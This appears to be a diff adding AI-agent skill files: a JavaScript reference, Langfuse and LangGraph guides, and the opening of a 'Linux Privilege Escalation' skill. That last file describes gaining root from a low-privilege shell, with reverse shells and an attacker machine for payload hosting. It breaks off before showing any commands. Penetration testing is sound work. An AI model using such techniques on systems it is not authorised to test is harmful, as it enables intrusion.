| "Developed features" | "Shipped to 50K users" |

### Visual Presentation
- Device mockups for web/mobile
- Before/after comparisons
- Process artifacts (wireframes, etc.)
- Video walkthroughs for complex work
- Hover effects for engagement
```

### Developer Portfolio Specifics

What works for dev portfolios

**When to use**: When building developer portfolio

```javascript
## Developer Portfolio

### What Hiring Managers Look For
1. Code quality (GitHub link)
2. Real projects (not just tutorials)
3. Problem-solving ability
4. Communication skills
5. Technical depth

### Must-Haves
- GitHub profile link (cleaned up)
- Live project links
- Tech stack for each project
- Your specific contribution (for team projects)

### Project Selection
| Include | Avoid |
|---------|-------|
| Real problems solved | Tutorial clones |
| Side projects with users | Incomplete projects |
| Open source contributions | "Coming soon" |
| Technical challenges | Basic CRUD apps |

### Technical Showcase
```javascript
// Show code snippets that demonstrate:
- Clean architecture decisions
- Performance optimizations
- Clever solutions
- Testing approach
```

### Blog/Writing
- Technical deep dives
- Problem-solving stories
- Learning journeys
- Shows communication skills
```

## Anti-Patterns

### ❌ Template Portfolio

**Why bad**: Looks like everyone else.
No memorable impression.
Doesn't show creativity.
Easy to forget.

**Instead**: Add personal touches.
Custom design elements.
Unique project presentations.
Your voice in the copy.

### ❌ All Style No Substance

**Why bad**: Fancy animations, weak projects.
Style over substance.
Hiring managers see through it.
No proof of skills.

**Instead**: Projects first, style second.
Real work with real impact.
Quality over quantity.
Depth over breadth.

### ❌ Resume Website

**Why bad**: Boring, forgettable.
Doesn't use the medium.
No personality.
Lists instead of stories.

**Instead**: Show, don't tell.
Visual case studies.
Interactive elements.
Personality throughout.

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Portfolio more complex than your actual work | medium | ## Right-Sizing Your Portfolio |
| Portfolio looks great on desktop, broken on mobile | high | ## Mobile-First Portfolio |
| Visitors don't know what to do next | medium | ## Portfolio CTAs |
| Portfolio shows old or irrelevant work | medium | ## Portfolio Freshness |

## Related Skills

Works well with: `scroll-experience`, `3d-web-experience`, `landing-page-design`, `personal-branding`

645 skills/javascript-mastery/SKILL.md Normal file
@@ -0,0 +1,645 @@
---
name: javascript-mastery
description: "Comprehensive JavaScript reference covering 33+ essential concepts every developer should know. From fundamentals like primitives and closures to advanced patterns like async/await and functional programming. Use when explaining JS concepts, debugging JavaScript issues, or teaching JavaScript fundamentals."
---

# 🧠 JavaScript Mastery

> 33+ essential JavaScript concepts every developer should know, inspired by [33-js-concepts](https://github.com/leonardomso/33-js-concepts).

## When to Use This Skill

Use this skill when:

- Explaining JavaScript concepts
- Debugging tricky JS behavior
- Teaching JavaScript fundamentals
- Reviewing code for JS best practices
- Understanding language quirks

---

## 1. Fundamentals

### 1.1 Primitive Types

JavaScript has 7 primitive types:

```javascript
// String
const str = "hello";

// Number (integers and floats)
const num = 42;
const float = 3.14;

// BigInt (for large integers)
const big = 9007199254740991n;

// Boolean
const bool = true;

// Undefined
let undef; // undefined

// Null
const empty = null;

// Symbol (unique identifiers)
const sym = Symbol("description");
```

**Key points**:

- Primitives are immutable
- Passed by value
- `typeof null === "object"` is a historical bug

### 1.2 Type Coercion

JavaScript implicitly converts types:

```javascript
// String coercion
"5" + 3; // "53" (number → string)
"5" - 3; // 2 (string → number)

// Boolean coercion
Boolean(""); // false
Boolean("hello"); // true
Boolean(0); // false
Boolean([]); // true (!)

// Equality coercion
"5" == 5; // true (coerces)
"5" === 5; // false (strict)
```

**Falsy values** (8 total):
`false`, `0`, `-0`, `0n`, `""`, `null`, `undefined`, `NaN`

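The list above can be verified directly, and contrasted with values that look empty but are truthy:

```javascript
// All eight falsy values coerce to false.
const falsyValues = [false, 0, -0, 0n, "", null, undefined, NaN];
falsyValues.every((v) => !v); // true

// Values that surprise people by being truthy:
Boolean([]); // true - empty array
Boolean({}); // true - empty object
Boolean("0"); // true - non-empty string
Boolean(new Boolean(false)); // true - it's an object!
```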
### 1.3 Equality Operators

```javascript
// == (loose equality) - coerces types
null == undefined; // true
"1" == 1; // true

// === (strict equality) - no coercion
null === undefined; // false
"1" === 1; // false

// Object.is() - handles edge cases
Object.is(NaN, NaN); // true (NaN === NaN is false!)
Object.is(-0, 0); // false (0 === -0 is true!)
```

**Rule**: Always use `===` unless you have a specific reason not to.

---

## 2. Scope & Closures

### 2.1 Scope Types

```javascript
// Global scope
var globalVar = "global";

function outer() {
  // Function scope
  var functionVar = "function";

  if (true) {
    // Block scope (let/const only)
    let blockVar = "block";
    const alsoBlock = "block";
    var notBlock = "function"; // var ignores blocks!
  }
}
```

### 2.2 Closures

A closure is a function that remembers its lexical scope:

```javascript
function createCounter() {
  let count = 0; // "closed over" variable

  return {
    increment() {
      return ++count;
    },
    decrement() {
      return --count;
    },
    getCount() {
      return count;
    },
  };
}

const counter = createCounter();
counter.increment(); // 1
counter.increment(); // 2
counter.getCount(); // 2
```

**Common use cases**:

- Data privacy (module pattern)
- Function factories
- Partial application
- Memoization

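Memoization is a direct application of this pattern: the cache lives in the closure, invisible to callers. A small sketch:

```javascript
// The returned function closes over `cache`; repeat calls with the
// same arguments skip the underlying computation.
function memoize(fn) {
  const cache = new Map();
  return function (...args) {
    const key = JSON.stringify(args);
    if (!cache.has(key)) {
      cache.set(key, fn.apply(this, args));
    }
    return cache.get(key);
  };
}

let calls = 0;
const square = memoize((n) => {
  calls++;
  return n * n;
});

square(4); // 16 (computed, calls = 1)
square(4); // 16 (cached, calls still 1)
square(5); // 25 (computed, calls = 2)
```

Note the `JSON.stringify` key only works for serializable arguments; for object identity you would reach for a `WeakMap` instead.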
### 2.3 var vs let vs const

```javascript
// var - function scoped, hoisted, can redeclare
var x = 1;
var x = 2; // OK

// let - block scoped, hoisted (TDZ), no redeclare
let y = 1;
// let y = 2; // Error!

// const - like let, but can't reassign
const z = 1;
// z = 2; // Error!

// BUT: const objects are mutable
const obj = { a: 1 };
obj.a = 2; // OK
obj.b = 3; // OK
```

---

## 3. Functions & Execution

### 3.1 Call Stack

```javascript
function first() {
  console.log("first start");
  second();
  console.log("first end");
}

function second() {
  console.log("second");
}

first();
// Output:
// "first start"
// "second"
// "first end"
```

Stack overflow example:

```javascript
function infinite() {
  infinite(); // No base case!
}
infinite(); // RangeError: Maximum call stack size exceeded
```

### 3.2 Hoisting

```javascript
// Variable hoisting
console.log(a); // undefined (hoisted, not initialized)
var a = 5;

console.log(b); // ReferenceError (TDZ)
let b = 5;

// Function hoisting
sayHi(); // Works!
function sayHi() {
  console.log("Hi!");
}

// Function expressions don't hoist
sayBye(); // TypeError
var sayBye = function () {
  console.log("Bye!");
};
```

### 3.3 this Keyword

```javascript
// Global context
console.log(this); // window (browser) or global (Node)

// Object method
const obj = {
  name: "Alice",
  greet() {
    console.log(this.name); // "Alice"
  },
};

// Arrow functions (lexical this)
const obj2 = {
  name: "Bob",
  greet: () => {
    console.log(this.name); // undefined (inherits outer this)
  },
};

// Explicit binding
function greet() {
  console.log(this.name);
}
greet.call({ name: "Charlie" }); // "Charlie"
greet.apply({ name: "Diana" }); // "Diana"
const bound = greet.bind({ name: "Eve" });
bound(); // "Eve"
```

---

## 4. Event Loop & Async

### 4.1 Event Loop

```javascript
console.log("1");

setTimeout(() => console.log("2"), 0);

Promise.resolve().then(() => console.log("3"));

console.log("4");

// Output: 1, 4, 3, 2
// Why? Microtasks (Promises) run before macrotasks (setTimeout)
```

**Execution order**:

1. Synchronous code (call stack)
2. Microtasks (Promise callbacks, queueMicrotask)
3. Macrotasks (setTimeout, setInterval, I/O)

### 4.2 Callbacks

```javascript
// Callback pattern
function fetchData(callback) {
  setTimeout(() => {
    callback(null, { data: "result" });
  }, 1000);
}

// Error-first convention
fetchData((error, result) => {
  if (error) {
    console.error(error);
    return;
  }
  console.log(result);
});

// Callback hell (avoid this!)
getData((data) => {
  processData(data, (processed) => {
    saveData(processed, (saved) => {
      notify(saved, () => {
        // 😱 Pyramid of doom
      });
    });
  });
});
```

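The usual escape from the pyramid is wrapping error-first callbacks so they return Promises (Node ships this as `util.promisify`; here is a hand-rolled sketch):

```javascript
// Wrap an error-first callback API so it returns a Promise instead.
function promisify(fn) {
  return (...args) =>
    new Promise((resolve, reject) => {
      fn(...args, (error, result) => {
        if (error) reject(error);
        else resolve(result);
      });
    });
}

function fetchData(callback) {
  setTimeout(() => callback(null, { data: "result" }), 10);
}

const fetchDataAsync = promisify(fetchData);
fetchDataAsync().then((result) => console.log(result.data)); // "result"
```

Once wrapped, the nested callbacks above flatten into a `.then()` chain or an `async`/`await` sequence.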
### 4.3 Promises

```javascript
// Creating a Promise
const promise = new Promise((resolve, reject) => {
  setTimeout(() => {
    resolve("Success!");
    // or: reject(new Error("Failed!"));
  }, 1000);
});

// Consuming Promises
promise
  .then((result) => console.log(result))
  .catch((error) => console.error(error))
  .finally(() => console.log("Done"));

// Promise combinators
Promise.all([p1, p2, p3]); // All must succeed
Promise.allSettled([p1, p2]); // Wait for all, get status
Promise.race([p1, p2]); // First to settle
Promise.any([p1, p2]); // First to succeed
```

### 4.4 async/await

```javascript
async function fetchUserData(userId) {
  try {
    const response = await fetch(`/api/users/${userId}`);
    if (!response.ok) throw new Error("Failed to fetch");
    const user = await response.json();
    return user;
  } catch (error) {
    console.error("Error:", error);
    throw error; // Re-throw for caller to handle
  }
}

// Parallel execution
async function fetchAll() {
  const [users, posts] = await Promise.all([
    fetch("/api/users"),
    fetch("/api/posts"),
  ]);
  return { users, posts };
}
```

---

## 5. Functional Programming

### 5.1 Higher-Order Functions

Functions that take or return functions:

```javascript
// Takes a function
const numbers = [1, 2, 3];
const doubled = numbers.map((n) => n * 2); // [2, 4, 6]

// Returns a function
function multiply(a) {
  return function (b) {
    return a * b;
  };
}
const double = multiply(2);
double(5); // 10
```

### 5.2 Pure Functions

```javascript
// Pure: same input → same output, no side effects
function add(a, b) {
  return a + b;
}

// Impure: modifies external state
let total = 0;
function addToTotal(value) {
  total += value; // Side effect!
  return total;
}

// Impure: depends on external state
function getDiscount(price) {
  return price * globalDiscountRate; // External dependency
}
```

### 5.3 map, filter, reduce

```javascript
const users = [
  { name: "Alice", age: 25 },
  { name: "Bob", age: 30 },
  { name: "Charlie", age: 35 },
];

// map: transform each element
const names = users.map((u) => u.name);
// ["Alice", "Bob", "Charlie"]

// filter: keep elements matching condition
const adults = users.filter((u) => u.age >= 30);
// [{ name: "Bob", ... }, { name: "Charlie", ... }]

// reduce: accumulate into single value
const totalAge = users.reduce((sum, u) => sum + u.age, 0);
// 90

// Chaining
const result = users
  .filter((u) => u.age >= 30)
  .map((u) => u.name)
  .join(", ");
// "Bob, Charlie"
```

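`reduce` also generalizes beyond sums. A common sketch is grouping items by a computed key:

```javascript
// groupBy as a fold: each item is pushed into a bucket keyed by keyFn.
function groupBy(items, keyFn) {
  return items.reduce((groups, item) => {
    const key = keyFn(item);
    (groups[key] ??= []).push(item);
    return groups;
  }, {});
}

const people = [
  { name: "Alice", age: 25 },
  { name: "Bob", age: 30 },
  { name: "Charlie", age: 35 },
];

const byDecade = groupBy(people, (p) => Math.floor(p.age / 10) * 10);
// { 20: [Alice], 30: [Bob, Charlie] }
```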
### 5.4 Currying & Composition

```javascript
// Currying: transform f(a, b, c) into f(a)(b)(c)
const curry = (fn) => {
  return function curried(...args) {
    if (args.length >= fn.length) {
      return fn.apply(this, args);
    }
    return (...moreArgs) => curried(...args, ...moreArgs);
  };
};

const add = curry((a, b, c) => a + b + c);
add(1)(2)(3); // 6
add(1, 2)(3); // 6
add(1)(2, 3); // 6

// Composition: combine functions
const compose =
  (...fns) =>
  (x) =>
    fns.reduceRight((acc, fn) => fn(acc), x);

const pipe =
  (...fns) =>
  (x) =>
    fns.reduce((acc, fn) => fn(acc), x);

const addOne = (x) => x + 1;
const double = (x) => x * 2;

const addThenDouble = compose(double, addOne);
addThenDouble(5); // 12 = (5 + 1) * 2

const doubleThenAdd = pipe(double, addOne);
doubleThenAdd(5); // 11 = (5 * 2) + 1
```

---

## 6. Objects & Prototypes

### 6.1 Prototypal Inheritance

```javascript
// Prototype chain
const animal = {
  speak() {
    console.log("Some sound");
  },
};

const dog = Object.create(animal);
dog.bark = function () {
  console.log("Woof!");
};

dog.speak(); // "Some sound" (inherited)
dog.bark(); // "Woof!" (own method)

// ES6 Classes (syntactic sugar)
class Animal {
  speak() {
    console.log("Some sound");
  }
}

class Dog extends Animal {
  bark() {
    console.log("Woof!");
  }
}
```

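The lookup order along the chain can be inspected directly with standard `Object` helpers (a self-contained sketch mirroring the example above, with the methods returning strings so they are easy to check):

```javascript
const animal = {
  speak() {
    return "Some sound";
  },
};

const dog = Object.create(animal);
dog.bark = () => "Woof!";

// Own properties vs. inherited ones:
Object.getPrototypeOf(dog) === animal; // true
Object.hasOwn(dog, "bark"); // true (own property)
Object.hasOwn(dog, "speak"); // false (lives on the prototype)
"speak" in dog; // true (`in` walks the whole chain)
```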
### 6.2 Object Methods

```javascript
const obj = { a: 1, b: 2 };

// Keys, values, entries
Object.keys(obj); // ["a", "b"]
Object.values(obj); // [1, 2]
Object.entries(obj); // [["a", 1], ["b", 2]]

// Shallow copy
const copy = { ...obj };
const copy2 = Object.assign({}, obj);

// Freeze (immutable)
const frozen = Object.freeze({ x: 1 });
frozen.x = 2; // Silently fails (or throws in strict mode)

// Seal (no add/delete, can modify)
const sealed = Object.seal({ x: 1 });
sealed.x = 2; // OK
sealed.y = 3; // Fails
delete sealed.x; // Fails
```

---

## 7. Modern JavaScript (ES6+)

### 7.1 Destructuring

```javascript
// Array destructuring
const [first, second, ...rest] = [1, 2, 3, 4, 5];
// first = 1, second = 2, rest = [3, 4, 5]

// Object destructuring
const { name, age, city = "Unknown" } = { name: "Alice", age: 25 };
// name = "Alice", age = 25, city = "Unknown"

// Renaming
const { name: userName } = { name: "Bob" };
// userName = "Bob"

// Nested
const {
  address: { street },
} = { address: { street: "123 Main" } };
```

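Destructuring also works in function parameters, which gives named options with per-field defaults; the trailing `= {}` keeps a bare call safe:

```javascript
// Named options with defaults; `= {}` guards the no-argument call.
function createUser({ name, role = "user", active = true } = {}) {
  return { name, role, active };
}

createUser({ name: "Alice" }); // { name: "Alice", role: "user", active: true }
createUser({ name: "Bob", role: "admin" }); // role overridden
createUser(); // no TypeError: { name: undefined, role: "user", active: true }
```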
### 7.2 Spread & Rest

```javascript
// Spread: expand iterable
const arr1 = [1, 2, 3];
const arr2 = [...arr1, 4, 5]; // [1, 2, 3, 4, 5]

const obj1 = { a: 1 };
const obj2 = { ...obj1, b: 2 }; // { a: 1, b: 2 }

// Rest: collect remaining
function sum(...numbers) {
  return numbers.reduce((a, b) => a + b, 0);
}
sum(1, 2, 3, 4); // 10
```

### 7.3 Modules

```javascript
// Named exports
export const PI = 3.14159;
export function square(x) {
  return x * x;
}

// Default export
export default class Calculator {}

// Importing
import Calculator, { PI, square } from "./math.js";
import * as math from "./math.js";

// Dynamic import
const module = await import("./dynamic.js");
```

### 7.4 Optional Chaining & Nullish Coalescing

```javascript
// Optional chaining (?.)
const user = { address: { city: "NYC" } };
const city = user?.address?.city; // "NYC"
const zip = user?.address?.zip; // undefined (no error)
const fn = user?.getName?.(); // undefined if no method

// Nullish coalescing (??)
const value = null ?? "default"; // "default"
const zero = 0 ?? "default"; // 0 (not nullish!)
const empty = "" ?? "default"; // "" (not nullish!)

// Compare with ||
const value2 = 0 || "default"; // "default" (0 is falsy)
```

---

## Quick Reference Card

| Concept | Key Point |
| :------------- | :-------------------------------- |
| `==` vs `===` | Always use `===` |
| `var` vs `let` | Prefer `let`/`const` |
| Closures | Function + lexical scope |
| `this` | Depends on how function is called |
| Event loop | Microtasks before macrotasks |
| Pure functions | Same input → same output |
| Prototypes | `__proto__` → prototype chain |
| `??` vs `\|\|` | `??` only checks null/undefined |

---

## Resources

- [33 JS Concepts](https://github.com/leonardomso/33-js-concepts)
- [JavaScript.info](https://javascript.info/)
- [MDN JavaScript Guide](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide)
- [You Don't Know JS](https://github.com/getify/You-Dont-Know-JS)

238 skills/langfuse/SKILL.md Normal file
@@ -0,0 +1,238 @@
|
||||
---
|
||||
name: langfuse
|
||||
description: "Expert in Langfuse - the open-source LLM observability platform. Covers tracing, prompt management, evaluation, datasets, and integration with LangChain, LlamaIndex, and OpenAI. Essential for debugging, monitoring, and improving LLM applications in production. Use when: langfuse, llm observability, llm tracing, prompt management, llm evaluation."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Langfuse
|
||||
|
||||
**Role**: LLM Observability Architect

You are an expert in LLM observability and evaluation. You think in terms of
traces, spans, and metrics. You know that LLM applications need monitoring
just like traditional software - but with different dimensions (cost, quality,
latency). You use data to drive prompt improvements and catch regressions.

## Capabilities

- LLM tracing and observability
- Prompt management and versioning
- Evaluation and scoring
- Dataset management
- Cost tracking
- Performance monitoring
- A/B testing prompts

## Requirements

- Python or TypeScript/JavaScript
- Langfuse account (cloud or self-hosted)
- LLM API keys

## Patterns

### Basic Tracing Setup

Instrument LLM calls with Langfuse

**When to use**: Any LLM application

```python
import openai
from langfuse import Langfuse

# Initialize client
langfuse = Langfuse(
    public_key="pk-...",
    secret_key="sk-...",
    host="https://cloud.langfuse.com"  # or self-hosted URL
)

# Create a trace for a user request
trace = langfuse.trace(
    name="chat-completion",
    user_id="user-123",
    session_id="session-456",  # Groups related traces
    metadata={"feature": "customer-support"},
    tags=["production", "v2"]
)

# Log a generation (LLM call)
generation = trace.generation(
    name="gpt-4o-response",
    model="gpt-4o",
    model_parameters={"temperature": 0.7},
    input={"messages": [{"role": "user", "content": "Hello"}]},
    metadata={"attempt": 1}
)

# Make actual LLM call
response = openai.chat.completions.create(
    model="gpt-4o",
    messages=[{"role": "user", "content": "Hello"}]
)

# Complete the generation with output
generation.end(
    output=response.choices[0].message.content,
    usage={
        "input": response.usage.prompt_tokens,
        "output": response.usage.completion_tokens
    }
)

# Score the trace
trace.score(
    name="user-feedback",
    value=1,  # 1 = positive, 0 = negative
    comment="User clicked helpful"
)

# Flush before exit (important in serverless)
langfuse.flush()
```

### OpenAI Integration

Automatic tracing with the OpenAI SDK

**When to use**: OpenAI-based applications

```python
from langfuse.openai import openai

# Drop-in replacement for the OpenAI client:
# all calls are automatically traced.

response = openai.chat.completions.create(
    model="gpt-4o",
    messages=[{"role": "user", "content": "Hello"}],
    # Langfuse-specific parameters
    name="greeting",  # Trace name
    session_id="session-123",
    user_id="user-456",
    tags=["test"],
    metadata={"feature": "chat"}
)

# Works with streaming
stream = openai.chat.completions.create(
    model="gpt-4o",
    messages=[{"role": "user", "content": "Tell me a story"}],
    stream=True,
    name="story-generation"
)

for chunk in stream:
    print(chunk.choices[0].delta.content, end="")

# Works with async
import asyncio
from langfuse.openai import AsyncOpenAI

async_client = AsyncOpenAI()

async def main():
    response = await async_client.chat.completions.create(
        model="gpt-4o",
        messages=[{"role": "user", "content": "Hello"}],
        name="async-greeting"
    )
```
### LangChain Integration

Trace LangChain applications

**When to use**: LangChain-based applications

```python
from langchain_openai import ChatOpenAI
from langchain_core.prompts import ChatPromptTemplate
from langfuse.callback import CallbackHandler

# Create Langfuse callback handler
langfuse_handler = CallbackHandler(
    public_key="pk-...",
    secret_key="sk-...",
    host="https://cloud.langfuse.com",
    session_id="session-123",
    user_id="user-456"
)

# Use with any LangChain component
llm = ChatOpenAI(model="gpt-4o")

prompt = ChatPromptTemplate.from_messages([
    ("system", "You are a helpful assistant."),
    ("user", "{input}")
])

chain = prompt | llm

# Pass handler to invoke
response = chain.invoke(
    {"input": "Hello"},
    config={"callbacks": [langfuse_handler]}
)

# Or set as default
import langchain
langchain.callbacks.manager.set_handler(langfuse_handler)

# Then all calls are traced
response = chain.invoke({"input": "Hello"})

# Works with agents, retrievers, etc.
from langchain.agents import AgentExecutor, create_openai_tools_agent

agent = create_openai_tools_agent(llm, tools, prompt)
agent_executor = AgentExecutor(agent=agent, tools=tools)

result = agent_executor.invoke(
    {"input": "What's the weather?"},
    config={"callbacks": [langfuse_handler]}
)
```
## Anti-Patterns

### ❌ Not Flushing in Serverless

**Why bad**: Traces are sent in batches, and a serverless function may exit before the batch is flushed, so the data is silently lost.

**Instead**: Always call `langfuse.flush()` before exit.
Use context managers where available.
Consider sync mode for critical traces.
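One way to make the flush rule hard to forget is a small wrapper that guarantees `flush()` runs on every exit path. This is a sketch only: `StubClient` is a stand-in used for illustration, not part of the Langfuse SDK; any object with a `flush()` method works.

```python
from contextlib import contextmanager

@contextmanager
def traced(client):
    """Guarantee client.flush() runs, even if the handler raises."""
    try:
        yield client
    finally:
        client.flush()  # always runs: normal exit, exception, or early return

# Minimal stand-in client for illustration (not the real SDK)
class StubClient:
    def __init__(self):
        self.flushed = False

    def flush(self):
        self.flushed = True

client = StubClient()
with traced(client):
    pass  # request-handling logic goes here

print(client.flushed)  # True
```

The same shape works in a serverless handler: wrap the body of the function so the flush happens before the runtime freezes or tears down the instance.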

### ❌ Tracing Everything

**Why bad**: Noisy traces, performance overhead, and the important information becomes hard to find.

**Instead**: Focus on LLM calls, key logic, and user actions.
Group related operations.
Use meaningful span names.

### ❌ No User/Session IDs

**Why bad**: You can't debug specific users or track sessions, and analytics are limited.

**Instead**: Always pass user_id and session_id.
Use consistent identifiers.
Add relevant metadata.

## Limitations

- Self-hosting requires managing infrastructure
- High-volume workloads may need optimization
- Real-time dashboard has some latency
- Evaluation requires setup

## Related Skills

Works well with: `langgraph`, `crewai`, `structured-output`, `autonomous-agents`
287 skills/langgraph/SKILL.md Normal file
@@ -0,0 +1,287 @@
---
name: langgraph
description: "Expert in LangGraph - the production-grade framework for building stateful, multi-actor AI applications. Covers graph construction, state management, cycles and branches, persistence with checkpointers, human-in-the-loop patterns, and the ReAct agent pattern. Used in production at LinkedIn, Uber, and 400+ companies. This is LangChain's recommended approach for building agents. Use when: langgraph, langchain agent, stateful agent, agent graph, react agent."
source: vibeship-spawner-skills (Apache 2.0)
---

# LangGraph

**Role**: LangGraph Agent Architect

You are an expert in building production-grade AI agents with LangGraph. You
understand that agents need explicit structure - graphs make the flow visible
and debuggable. You design state carefully, use reducers appropriately, and
always consider persistence for production. You know when cycles are needed
and how to prevent infinite loops.

## Capabilities

- Graph construction (StateGraph)
- State management and reducers
- Node and edge definitions
- Conditional routing
- Checkpointers and persistence
- Human-in-the-loop patterns
- Tool integration
- Streaming and async execution

## Requirements

- Python 3.9+
- langgraph package
- LLM API access (OpenAI, Anthropic, etc.)
- Understanding of graph concepts

## Patterns

### Basic Agent Graph

Simple ReAct-style agent with tools

**When to use**: Single agent with tool calling

```python
from typing import Annotated, TypedDict
from langgraph.graph import StateGraph, START, END
from langgraph.graph.message import add_messages
from langgraph.prebuilt import ToolNode
from langchain_openai import ChatOpenAI
from langchain_core.tools import tool

# 1. Define State
class AgentState(TypedDict):
    messages: Annotated[list, add_messages]
    # add_messages reducer appends, doesn't overwrite

# 2. Define Tools
@tool
def search(query: str) -> str:
    """Search the web for information."""
    # Implementation here
    return f"Results for: {query}"

@tool
def calculator(expression: str) -> str:
    """Evaluate a math expression."""
    return str(eval(expression))  # demo only: eval on untrusted input is unsafe

tools = [search, calculator]

# 3. Create LLM with tools
llm = ChatOpenAI(model="gpt-4o").bind_tools(tools)

# 4. Define Nodes
def agent(state: AgentState) -> dict:
    """The agent node - calls the LLM."""
    response = llm.invoke(state["messages"])
    return {"messages": [response]}

# Tool node handles tool execution
tool_node = ToolNode(tools)

# 5. Define Routing
def should_continue(state: AgentState) -> str:
    """Route based on whether tools were called."""
    last_message = state["messages"][-1]
    if last_message.tool_calls:
        return "tools"
    return END

# 6. Build Graph
graph = StateGraph(AgentState)

# Add nodes
graph.add_node("agent", agent)
graph.add_node("tools", tool_node)

# Add edges
graph.add_edge(START, "agent")
graph.add_conditional_edges("agent", should_continue, ["tools", END])
graph.add_edge("tools", "agent")  # Loop back

# Compile
app = graph.compile()

# 7. Run
result = app.invoke({
    "messages": [("user", "What is 25 * 4?")]
})
```

### State with Reducers

Complex state management with custom reducers

**When to use**: Multiple agents updating shared state

```python
from typing import Annotated, TypedDict
from operator import add
from langgraph.graph import StateGraph
from langgraph.graph.message import add_messages

# Custom reducer for merging dictionaries
def merge_dicts(left: dict, right: dict) -> dict:
    return {**left, **right}

# State with multiple reducers
class ResearchState(TypedDict):
    # Messages append (don't overwrite)
    messages: Annotated[list, add_messages]

    # Research findings merge
    findings: Annotated[dict, merge_dicts]

    # Sources accumulate
    sources: Annotated[list[str], add]

    # Current step (overwrites - no reducer)
    current_step: str

    # Error count (custom reducer)
    errors: Annotated[int, lambda a, b: a + b]

# Nodes return partial state updates
def researcher(state: ResearchState) -> dict:
    # Only return fields being updated
    return {
        "findings": {"topic_a": "New finding"},
        "sources": ["source1.com"],
        "current_step": "researching"
    }

def writer(state: ResearchState) -> dict:
    # Access accumulated state
    all_findings = state["findings"]
    all_sources = state["sources"]

    return {
        "messages": [("assistant", f"Report based on {len(all_sources)} sources")],
        "current_step": "writing"
    }

# Build graph
graph = StateGraph(ResearchState)
graph.add_node("researcher", researcher)
graph.add_node("writer", writer)
# ... add edges
```
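The reducer mechanics above can be illustrated framework-free. This is a sketch of the idea only, not LangGraph's internals: each state key maps to a reducer that combines the existing value with a node's partial update, and keys without a reducer are simply overwritten.

```python
from operator import add

def merge_dicts(left: dict, right: dict) -> dict:
    return {**left, **right}

# Reducer per key; keys absent from this table are overwritten
REDUCERS = {
    "findings": merge_dicts,
    "sources": add,                  # list concatenation
    "errors": lambda a, b: a + b,
}

def apply_update(state: dict, update: dict) -> dict:
    """Merge a node's partial update into the state using per-key reducers."""
    new_state = dict(state)
    for key, value in update.items():
        reducer = REDUCERS.get(key)
        if reducer is not None and key in state:
            new_state[key] = reducer(state[key], value)
        else:
            new_state[key] = value   # no reducer: overwrite
    return new_state

state = {"findings": {}, "sources": [], "errors": 0, "current_step": "start"}
state = apply_update(state, {"findings": {"a": 1}, "sources": ["s1"],
                             "current_step": "researching"})
state = apply_update(state, {"findings": {"b": 2}, "sources": ["s2"], "errors": 1})

print(state["findings"])   # {'a': 1, 'b': 2}
print(state["sources"])    # ['s1', 's2']
```

This is why nodes only return the fields they changed: the reducers, not the nodes, decide how updates combine.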

### Conditional Branching

Route to different paths based on state

**When to use**: Multiple possible workflows

```python
from typing import TypedDict
from langgraph.graph import StateGraph, START, END

class RouterState(TypedDict):
    query: str
    query_type: str
    result: str

def classifier(state: RouterState) -> dict:
    """Classify the query type."""
    query = state["query"].lower()
    if "code" in query or "program" in query:
        return {"query_type": "coding"}
    elif "search" in query or "find" in query:
        return {"query_type": "search"}
    else:
        return {"query_type": "chat"}

def coding_agent(state: RouterState) -> dict:
    return {"result": "Here's your code..."}

def search_agent(state: RouterState) -> dict:
    return {"result": "Search results..."}

def chat_agent(state: RouterState) -> dict:
    return {"result": "Let me help..."}

# Routing function
def route_query(state: RouterState) -> str:
    """Route to the appropriate agent."""
    query_type = state["query_type"]
    return query_type  # Returns node name

# Build graph
graph = StateGraph(RouterState)

graph.add_node("classifier", classifier)
graph.add_node("coding", coding_agent)
graph.add_node("search", search_agent)
graph.add_node("chat", chat_agent)

graph.add_edge(START, "classifier")

# Conditional edges from classifier
graph.add_conditional_edges(
    "classifier",
    route_query,
    {
        "coding": "coding",
        "search": "search",
        "chat": "chat"
    }
)

# All agents lead to END
graph.add_edge("coding", END)
graph.add_edge("search", END)
graph.add_edge("chat", END)

app = graph.compile()
```

## Anti-Patterns

### ❌ Infinite Loop Without Exit

**Why bad**: The agent loops forever, burning tokens and cost until it eventually errors out.

**Instead**: Always have exit conditions:

- Max iterations counter in state
- Clear END conditions in routing
- Timeout at application level

```python
def should_continue(state):
    if state["iterations"] > 10:
        return END
    if state["task_complete"]:
        return END
    return "agent"
```

### ❌ Stateless Nodes

**Why bad**: Loses LangGraph's benefits. State is not persisted, so conversations can't be resumed.

**Instead**: Always use state for data flow.
Return state updates from nodes.
Use reducers for accumulation.
Let LangGraph manage state.

### ❌ Giant Monolithic State

**Why bad**: Hard to reason about, keeps unnecessary data in context, and adds serialization overhead.

**Instead**: Use input/output schemas for clean interfaces.
Private state for internal data.
Clear separation of concerns.

## Limitations

- Python-only (TypeScript in early stages)
- Learning curve for graph concepts
- State management complexity
- Debugging can be challenging

## Related Skills

Works well with: `crewai`, `autonomous-agents`, `langfuse`, `structured-output`
501 skills/linux-privilege-escalation/SKILL.md Normal file
@@ -0,0 +1,501 @@
---
name: Linux Privilege Escalation
description: This skill should be used when the user asks to "escalate privileges on Linux", "find privesc vectors on Linux systems", "exploit sudo misconfigurations", "abuse SUID binaries", "exploit cron jobs for root access", "enumerate Linux systems for privilege escalation", or "gain root access from low-privilege shell". It provides comprehensive techniques for identifying and exploiting privilege escalation paths on Linux systems.
---

# Linux Privilege Escalation

## Purpose

Execute systematic privilege escalation assessments on Linux systems to identify and exploit misconfigurations, vulnerable services, and security weaknesses that allow elevation from low-privilege user access to root-level control. This skill enables comprehensive enumeration and exploitation of kernel vulnerabilities, sudo misconfigurations, SUID binaries, cron jobs, capabilities, PATH hijacking, and NFS weaknesses.

## Inputs / Prerequisites

### Required Access

- Low-privilege shell access to target Linux system
- Ability to execute commands (interactive or semi-interactive shell)
- Network access for reverse shell connections (if needed)
- Attacker machine for payload hosting and receiving shells

### Technical Requirements

- Understanding of Linux filesystem permissions and ownership
- Familiarity with common Linux utilities and scripting
- Knowledge of kernel versions and associated vulnerabilities
- Basic understanding of compilation (gcc) for custom exploits

### Recommended Tools

- LinPEAS, LinEnum, or Linux Smart Enumeration scripts
- Linux Exploit Suggester (LES)
- GTFOBins reference for binary exploitation
- John the Ripper or Hashcat for password cracking
- Netcat or similar for reverse shells

## Outputs / Deliverables

### Primary Outputs

- Root shell access on target system
- Privilege escalation path documentation
- System enumeration findings report
